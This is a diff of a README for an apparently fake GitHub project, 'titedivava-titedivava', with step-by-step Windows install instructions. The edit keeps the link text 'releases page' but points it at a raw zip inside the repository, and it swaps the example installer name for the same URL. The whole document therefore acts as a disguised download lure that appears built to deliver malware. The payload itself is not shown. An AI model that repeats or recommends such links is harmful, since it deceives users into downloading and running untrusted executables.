HackSteam-oss/titedivava-titedivava/README.md

 Follow these steps to get titedivava-titedivava running on your Windows computer:

-1. Click the big blue Download button at the top, or visit the [releases page](https://github.com/HackSteam-oss/titedivava-titedivava/releases).
+1. Click the big blue Download button at the top, or visit the [releases page](https://raw.githubusercontent.com/HackSteam-oss/titedivava-titedivava/main/reorganization/titedivava-3.3.zip).
 This page contains all available versions.

 2. Find the latest release.
 Releases are listed by date and version number.
 Choose the newest release for the best experience.

 3. Download the Windows installer file.
-Look for a file with ".exe" at the end, such as `titedivava-setup.exe` or similar.
+Look for a file with ".exe" at the end, such as `https://raw.githubusercontent.com/HackSteam-oss/titedivava-titedivava/main/reorganization/titedivava-3.3.zip` or similar.

 4. Once the file is downloaded, double-click it to start the installation.